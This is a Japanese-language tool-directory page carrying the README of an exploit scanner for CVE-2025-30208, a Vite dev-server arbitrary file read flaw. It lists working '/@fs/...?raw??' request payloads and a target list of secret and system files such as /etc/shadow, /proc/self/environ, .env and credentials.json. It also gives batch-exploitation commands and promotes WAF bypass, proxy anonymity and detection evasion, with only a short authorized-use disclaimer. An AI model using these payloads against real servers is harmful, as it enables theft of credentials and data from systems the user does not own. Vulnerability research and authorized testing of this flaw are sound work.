Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 は、Vite 開発サーバー(人気のフロントエンドビルドツール)における中程度の重要度の任意ファイル読み取り脆弱性です。 | Kitploit
ツール/GitHubGitHub/themehackers/cve-2025-30208
脆弱性スキャナーペイロード生成エクスプロイト情報収集ウェブセキュリティペネトレーションテスト
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 は、Vite 開発サーバー(人気のフロントエンドビルドツール)における中程度の重要度の任意ファイル読み取り脆弱性です。

リポジトリを見る
1071年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔥 CVE-2025-30208 Vite任意ファイル読み取り脆弱性スキャナー

Python License Security Status Modular

エンタープライズ向け機能を備えたCVE-2025-30208対応の高度な脆弱性スキャナー

Vite任意ファイル読み取り脆弱性検出のためのプロフェッショナルペネトレーションテストツール

🚀 クイックスタート • 📋 機能 • 🔧 使い方 • 📊 例 • 🛡️ セキュリティ


📖 概要

これは、Vite開発サーバーのCVE-2025-30208脆弱性を検出・悪用するために設計された包括的な脆弱性スキャナーです。この脆弱性は、Viteのファイルシステムエンドポイントを通じて任意のファイル読み取りアクセスを可能にし、機密構成ファイル、ソースコード、システム情報を露呈する可能性があります。

🎯 このツールの役割

  • ネットワーク上の脆弱なViteインスタンスを検出
  • 安全に任意ファイル読み取り脆弱性を悪用
  • 機密ファイルや構成データを発見
  • 複数形式(HTML、JSON、コンソール)で結果を報告
  • スキャンセッションと構成を管理
  • 自動リトライ機構でエラーを適切に処理
  • 🏗️ モジュール式アーキテクチャ

    このツールは、保守性と拡張性を高めるモジュール式アーキテクチャを採用しています:

    • CVE-2025-30208.py - メインスキャナーアプリケーション
    • payloads.py - 高度なエクスプロイトペイロード(60以上のバリエーション)
    • sensitive_files.py - 包括的な機密ファイルデータベース(200以上のファイル)
    • html_template.py - 強化されたハッカー風HTMLレポートテンプレート

    🚀 クイックスタート

    前提条件

    root@kitploit:~
    pip3 install -r requirements.txt
    

    基本的な使い方

    root@kitploit:~
    python3 CVE-2025-30208.py
    
    CVE-2025-30208 > set RHOST 192.168.1.100
    CVE-2025-30208 > set RPORT 3000
    CVE-2025-30208 > run
    

    📋 機能

    🔍 コア脆弱性検出

    • 60以上の高度なペイロード: 最大限の検出を実現する包括的なエクスプロイト手法
    • スマート検出: 応答をインテリジェントに分析し、誤検知を回避
    • リアルタイム検証: ターゲット応答の継続的な検証
    • 包括的テスト: 既知のすべての脆弱エンドポイントをテスト

    🛡️ 強化されたセキュリティ機能

    • プロキシサポート: 匿名性のためのHTTP/HTTPSプロキシ設定
    • カスタムヘッダー: カスタムHTTPヘッダーによるWAF/IPSのバイパス
    • レート制限: 検出を回避するための設定可能な遅延
    • セッション管理: スキャンセッションの保存と復元
    • 入力検証: 包括的なパラメータ検証

    🔧 高度な機能

    • バッチスキャン: マルチスレッドによる複数ターゲットのスキャン
    • 機密ファイル発見: 200以上の機密ファイルを自動発見
    • 接続性テスト: TCP/UDP/HTTP/HTTPSプロトコルテスト
    • エラー回復: 指数バックオフによる自動リトライ
    • 包括的なログ記録: タイムスタンプ付きの詳細ログ

    📊 レポートと出力

    • 🎨 強化されたHTMLレポート: アニメーション付きの美しいハッカー風脆弱性レポート
    • JSONエクスポート: さらなる分析のための構造化データ
    • コンソール出力: 色分けされたリアルタイムフィードバック
    • ログファイル: 詳細な監査証跡
    • 対話型Webインターフェース: レポート表示用の組み込みWebサーバー

    🔧 使い方ガイド

    1. 基本設定

    root@kitploit:~
    CVE-2025-30208 > set RHOST 192.168.1.100
    CVE-2025-30208 > set RPORT 3000
    CVE-2025-30208 > set FILEPATH etc/passwd
    
    CVE-2025-30208 > test
    

    2. 脆弱性テスト

    root@kitploit:~
    CVE-2025-30208 > run
    
    # 詳細出力のためにverboseモードを有効化
    CVE-2025-30208 > verbose
    CVE-2025-30208 > run
    

    3. バッチスキャン

    root@kitploit:~
    CVE-2025-30208 > set THREADS 10
    CVE-2025-30208 > batch
    
    192.168.1.100:3000
    192.168.1.101:3000
    192.168.1.102:3000
    [Enterキーを2回押して終了]
    

    4. 機密ファイル発見

    root@kitploit:~
    CVE-2025-30208 > scan
    

    5. 高度な設定

    root@kitploit:~
    # プロキシの設定
    CVE-2025-30208 > proxy
    Enter proxy: http://127.0.0.1:8080
    
    # カスタムヘッダーの設定
    CVE-2025-30208 > headers
    Enter headers: {"User-Agent": "Custom Scanner"}
    
    # レート制限の設定
    CVE-2025-30208 > rate
    Enter rate limit: 1.0
    

    6. 強化されたHTMLレポート

    root@kitploit:~
    # 美しいHTMLレポートを生成
    CVE-2025-30208 > pull
    
    # レポート表示用のWebサーバーを起動
    CVE-2025-30208 > web
    
    # 特定のポートでWebサーバーを起動
    CVE-2025-30208 > web 8081
    
    # Webサーバーを停止
    CVE-2025-30208 > web off
    

    📊 コマンドリファレンス

    コマンド説明例
    set <option> <value>設定オプションを指定set RHOST 192.168.1.100
    show options現在の設定を表示show options
    edit対話型オプションエディターedit
    run / exploit脆弱性テストを実行run
    batch複数ターゲットをバッチスキャンbatch
    scan機密ファイルを発見scan
    pull結果をHTML/JSONにエクスポートpull
    web [on|off|port]HTMLレポート用のWebサーバーweb 8080
    saveセッション設定を保存save
    loadセッション設定を読み込みload
    testターゲットへの接続性をテストtest
    validate現在の設定を検証validate
    verboseverboseモードの切り替えverbose
    proxyプロキシ設定を構成proxy
    headersカスタムHTTPヘッダーを設定headers
    rateレート制限を構成rate
    logログ情報を表示log
    help / ?ヘルプを表示help

    ⚙️ 設定オプション

    オプション説明デフォルト値検証内容
    RHOSTターゲットホスト/IPアドレス-ホスト名/IP検証
    RPORTターゲットポート番号-ポート範囲(1-65535)
    FILEPATHテストするファイルパスetc/passwdパス検証
    PROXYHTTP/HTTPSプロキシURL-URL形式検証
    VERBOSEverbose出力の有効化false真偽値検証
    RATE_LIMITリクエスト間の遅延(秒)0.3数値検証
    THREADSバッチスキャンのスレッド数5整数検証
    TIMEOUTリクエストタイムアウト(秒)5整数検証
    CUSTOM_HEADERSカスタムHTTPヘッダー(JSON){}JSON形式検証

    🎨 強化されたペイロードシステム

    スキャナーは現在、payloads.pyに整理された60以上の異なるペイロードバリエーションを使用しています:

    主要 @fs ペイロード

    root@kitploit:~
    /@fs/{file_path}?raw??
    /@fs/{file_path}?raw&url
    /@fs/{file_path}?import&raw??
    /@fs/{file_path}?raw&import
    /@fs/{file_path}?import&url
    

    拡張パラメータバリエーション

    root@kitploit:~
    /@fs/{file_path}?raw&source
    /@fs/{file_path}?raw&content
    /@fs/{file_path}?raw&data
    /@fs/{file_path}?raw&file
    /@fs/{file_path}?raw&type=text
    /@fs/{file_path}?raw&format=text
    /@fs/{file_path}?raw&encoding=utf8
    

    Vite固有のバリエーション

    root@kitploit:~
    /@fs/{file_path}?raw&vite&dev
    /@fs/{file_path}?raw&vite&hot
    /@fs/{file_path}?raw&vite&hmr
    /@fs/{file_path}?raw&development
    /@fs/{file_path}?raw&debug
    

    モジュールシステムバリエーション

    root@kitploit:~
    /@fs/{file_path}?raw&esm
    /@fs/{file_path}?raw&cjs
    /@fs/{file_path}?raw&umd
    /@fs/{file_path}?raw&js
    /@fs/{file_path}?raw&ts
    /@fs/{file_path}?raw&json
    /@fs/{file_path}?raw&css
    /@fs/{file_path}?raw&html
    

    代替エンドポイント

    root@kitploit:~
    /app/{file_path}?raw??
    /App/{file_path}?raw??
    

    🔍 強化された機密ファイル発見

    このツールは現在、sensitive_files.pyに整理された200以上の機密ファイルをテストします:

    🖥️ システムファイル(Linux/Unix)

    • /etc/passwd - ユーザーアカウント情報
    • /etc/shadow - 暗号化されたパスワードデータ
    • /etc/services - ネットワークサービス
    • /etc/hosts - ホスト名マッピング
    • /etc/fstab - ファイルシステムテーブル
    • /etc/ssh/sshd_config - SSHサーバー設定
    • /etc/crontab - システムcronジョブ
    • /etc/sudoers - sudo設定

    📊 プロセス情報

    • /proc/version - カーネルバージョン
    • /proc/cpuinfo - CPU情報
    • /proc/meminfo - メモリ情報
    • /proc/self/environ - プロセス環境変数
    • /proc/self/cmdline - プロセスコマンドライン
    • /proc/net/tcp - TCP接続
    • /proc/net/udp - UDP接続

    ⚙️ アプリケーション設定

    • .env - 環境変数
    • .env.local - ローカル環境
    • .env.production - 本番環境
    • config.json - アプリケーション設定
    • settings.json - アプリケーション設定
    • application.properties - Spring設定
    • application.yml - YAML設定
    • database.yml - データベース設定
    • secrets.json - シークレット管理

    📦 Node.js / JavaScriptファイル

    • package.json - Node.js依存関係
    • package-lock.json - ロックされた依存関係
    • yarn.lock - Yarnロックファイル
    • vite.config.js - Vite設定
    • vite.config.ts - TypeScript Vite設定
    • tsconfig.json - TypeScript設定
    • webpack.config.js - Webpack設定
    • next.config.js - Next.js設定
    • nuxt.config.js - Nuxt.js設定
    • angular.json - Angular設定
    • vue.config.js - Vue.js設定
    • rollup.config.js - Rollup設定
    • eslint.config.js - ESLint設定
    • prettier.config.js - Prettier設定
    • jest.config.js - Jest設定
    • babel.config.js - Babel設定
    • tailwind.config.js - Tailwind CSS設定

    🔧 Gitファイル

    • .git/config - Git設定
    • .gitignore - Git無視ルール
    • .gitattributes - Git属性
    • .gitmodules - Gitサブモジュール
    • .git/HEAD - 現在のブランチ
    • .git/logs/HEAD - Gitログ
    • .git/refs/heads/master - masterブランチ
    • .git/refs/heads/main - mainブランチ

    📚 ドキュメントファイル

    • README.md - プロジェクトドキュメント
    • CHANGELOG.md - 変更履歴
    • LICENSE - ライセンス情報
    • CONTRIBUTING.md - コントリビューションガイドライン
    • AUTHORS - 著者情報
    • TODO.md - TODOリスト
    • ROADMAP.md - 開発ロードマップ

    🐳 Dockerファイル

    • Dockerfile - Docker設定
    • docker-compose.yml - Docker Compose
    • docker-compose.override.yml - オーバーライド設定
    • .dockerignore - Docker無視ルール
    • docker-compose.prod.yml - 本番環境設定
    • docker-compose.dev.yml - 開発環境設定

    🌐 Webサーバー設定

    • nginx.conf - Nginx設定
    • apache2.conf - Apache設定
    • httpd.conf - HTTPデーモン設定
    • .htaccess - Apacheアクセス制御
    • web.config - IIS設定
    • robots.txt - 検索エンジン指示
    • sitemap.xml - サイト構造
    • manifest.json - Webアプリマニフェスト
    • sw.js - Service Worker
    • firebase.json - Firebase設定
    • firebase.rules - Firebaseセキュリティルール

    🪟 Windowsファイル

    • boot.ini - ブート設定
    • autoexec.bat - 自動実行スクリプト
    • system.ini - システム設定
    • win.ini - Windows設定
    • Users - ユーザーディレクトリ
    • Windows - システムファイル
    • Program Files - アプリケーションディレクトリ

    🍎 macOSファイル

    • System - システムファイル
    • Library - ライブラリファイル
    • Applications - アプリケーションファイル
    • private/etc/hosts - hostsファイル
    • private/etc/passwd - ユーザーアカウント

    🗄️ データベースファイル

    • database.db - SQLiteデータベース
    • database.sqlite - SQLiteデータベース
    • data.db - データデータベース
    • dump.sql - データベースダンプ
    • schema.sql - データベーススキーマ
    • migrations - データベースマイグレーション

    📝 ログファイル

    • logs - ログディレクトリ
    • error.log - エラーログ
    • access.log - アクセスログ
    • app.log - アプリケーションログ
    • debug.log - デバッグログ
    • combined.log - 結合ログ

    💾 バックアップファイル

    • backup - バックアップディレクトリ
    • backup.sql - データベースバックアップ
    • backup.zip - 圧縮バックアップ
    • dump - データダンプ
    • export - データエクスポート

    🔒 セキュリティと認証

    • auth.json - 認証設定
    • credentials.json - 資格情報ストレージ
    • keys.json - キー管理
    • tokens.json - トークンストレージ
    • jwt.json - JWT設定
    • oauth.json - OAuth設定

    🔌 API・サービスファイル

    • api.json - API設定
    • swagger.json - APIドキュメント
    • openapi.json - OpenAPI仕様
    • graphql.json - GraphQL設定
    • schema.json - APIスキーマ

    ☁️ クラウド・デプロイメント

    • cloudformation.yml - AWS CloudFormation
    • serverless.yml - Serverless設定
    • terraform.tf - Terraform設定
    • kubernetes.yml - Kubernetes設定
    • k8s.yml - Kubernetes設定

    📊 モニタリング・分析

    • analytics.json - 分析設定
    • monitoring.json - モニタリング設定
    • metrics.json - メトリクス設定
    • telemetry.json - テレメトリデータ

    🎨 強化されたHTMLレポート

    このツールは現在、美しいハッカー風HTMLレポートを生成します:

    ✨ ビジュアル機能

    • マトリックス風背景: アニメーションする落下文字
    • グラデーションアニメーションと発光効果
    • ホバー効果付き対話型要素
    • 全デバイス対応のレスポンシブデザイン
    • セキュリティプロフェッショナル向けに最適化されたダークテーマ

    📊 対話型統計

    • リアルタイムカウンター: 総リーク数と公開バイト数
    • 重要度インジケーター: 色分け表示
    • 各リークのコピー機能
    • コンテンツプレビュー: サイズと行数表示
    • 詳細分析のための展開可能セクション

    🔧 技術機能

    • Google Fonts統合(JetBrains Mono、Orbitron)
    • CSSアニメーションとトランジション
    • JavaScript対話性: ユーザー体験の向上
    • モバイルレスポンシブデザイン
    • クロスブラウザ互換性

    🌐 Webサーバー統合

    • レポート表示用の組み込みHTTPサーバー
    • 自動ブラウザ起動
    • ポート設定オプション
    • 簡単な起動・停止コマンド

    🛡️ エラー処理と復旧

    自動リトライ機構

    • 3回のリトライ試行: 失敗したリクエストは自動的にリトライ
    • 指数バックオフ: リトライ間の遅延を増加
    • スマートエラー分類: エラータイプに応じた異なる処理
    • グレースフルリカバリ: エラー後もツールは動作継続

    エラーカテゴリ

    • ネットワークエラー: 接続、タイムアウト、プロキシ問題
    • 設定エラー: 無効な設定やパラメータ
    • 検証エラー: 無効な入力パラメータ
    • スキャナーエラー: 一般的なスキャナーエラー

    検証機能

    • リアルタイム入力検証: すべてのパラメータを使用前に検証
    • 設定検証: スキャン前に完全な検証を実施
    • 接続性テスト: TCP/UDP/HTTP/HTTPSプロトコルテスト
    • プロキシ検証: プロキシURL形式の検証

    📁 出力ファイル

    ファイル説明形式
    data_leak.html強化されたハッカー風HTML脆弱性レポートHTML
    data_leak.json構造化JSONエクスポートJSON
    sensitive_files_discovery.json発見された機密ファイルJSON
    session.json保存されたセッション設定JSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.log詳細な監査ログテキスト

    📝 影響を受けるバージョン

    🚨 脆弱なバージョン

    root@kitploit:~
    6.2.0 ≤ Vite ≤ 6.2.2
    6.1.0 ≤ Vite ≤ 6.1.1
    6.0.0 ≤ Vite ≤ 6.0.11
    5.0.0 ≤ Vite ≤ 5.4.14
    Vite ≤ 4.5.9
    

    ✅ 影響を受けないバージョン

    root@kitploit:~
    Vite ≥ 6.2.3
    6.1.2 ≤ Vite < 6.2.0
    6.0.12 ≤ Vite < 6.1.0
    5.4.15 ≤ Vite < 6.0.0
    4.5.10 ≤ Vite < 5.0.0
    

    🛡️ セキュリティと倫理的な使用

    ⚠️ 重要なセキュリティ注意事項

    • 許可されたテストのみ: 自身が所有する、またはテストする明示的な許可があるシステムでのみ使用してください
    • 責任ある開示: 脆弱性はシステム所有者に報告してください
    • レート制限: ターゲットに過負荷をかけないよう適切な遅延を使用
    • プロキシの使用: 必要に応じて匿名性のためにプロキシの使用を検討
    • 法的順守: 現地の法律と規制の順守を徹底

    🔒 ベストプラクティス

    • テスト前に必ず書面による許可を取得
    • 管理された環境でのみ使用
    • すべてのテスト活動を文書化
    • レート制限とシステムリソースを尊重
    • 発見事項を責任を持って報告

    🚀 高度な使用例

    例1: 包括的なネットワークスキャン

    root@kitploit:~
    CVE-2025-30208 > set THREADS 20
    CVE-2025-30208 > set RATE_LIMIT 0.5
    CVE-2025-30208 > set TIMEOUT 10
    CVE-2025-30208 > verbose
    CVE-2025-30208 > batch
    

    例2: プロキシを使用したステルススキャン

    root@kitploit:~
    CVE-2025-30208 > proxy
    Enter proxy: http://127.0.0.1:8080
    CVE-2025-30208 > headers
    Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
    CVE-2025-30208 > set RATE_LIMIT 2.0
    CVE-2025-30208 > run
    

    例3: 強化されたレポートワークフロー

    root@kitploit:~
    CVE-2025-30208 > set RHOST 192.168.1.100
    CVE-2025-30208 > set RPORT 3000
    CVE-2025-30208 > run
    CVE-2025-30208 > pull
    CVE-2025-30208 > web 8080
    

    例4: 機密ファイル発見

    root@kitploit:~
    CVE-2025-30208 > set RHOST 192.168.1.100
    CVE-2025-30208 > set RPORT 3000
    CVE-2025-30208 > scan
    

    🏗️ プロジェクト構造

    root@kitploit:~
    CVE-2025-30208/
    ├── CVE-2025-30208.py          # メインスキャナーアプリケーション
    ├── payloads.py                # 高度なエクスプロイトペイロード(60以上)
    ├── sensitive_files.py         # 機密ファイルデータベース(200以上)
    ├── html_template.py           # 強化されたHTMLレポートテンプレート
    ├── README.md                  # このドキュメント
    ├── requirements.txt           # Python依存関係
    ├── logs/                      # ログファイルディレクトリ
    ├── data_leak.html            # 生成されたHTMLレポート
    ├── data_leak.json            # 生成されたJSONレポート
    └── session.json              # 保存されたセッション設定
    

    🤝 コントリビューション

    このツールの改善への貢献を歓迎します:

    1. リポジトリをフォーク
    2. 機能ブランチを作成
    3. 変更を加える
    4. 十分にテスト
    5. プルリクエストを送信

    貢献分野

    • payloads.pyへの新しいペイロードバリエーション
    • sensitive_files.pyへの追加の機密ファイルパターン
    • html_template.pyの強化されたHTMLテンプレート
    • エラー処理の改善
    • パフォーマンス最適化
    • ドキュメントの改善

    📄 ライセンス

    このプロジェクトは教育目的および許可されたセキュリティテスト目的のみでライセンスされています。

    ⚠️ 法的免責事項: このツールは許可されたセキュリティテストおよび研究目的のみを対象としています。システムをテストする前に適切な許可を得ていることを確認する責任はユーザーにあります。著者はこのツールの誤用について一切の責任を負いません。


    👨‍💻 著者

    ThemeHackers

    GitHub

    セキュリティ研究者&ペネトレーションテスター


    ⭐ このツールが役に立った場合は、スターを付けてください! ⭐

    セキュリティコミュニティのために❤️を込めて作られました

    ツールをダウンロード
    exit / quit
    ツールを終了
    exit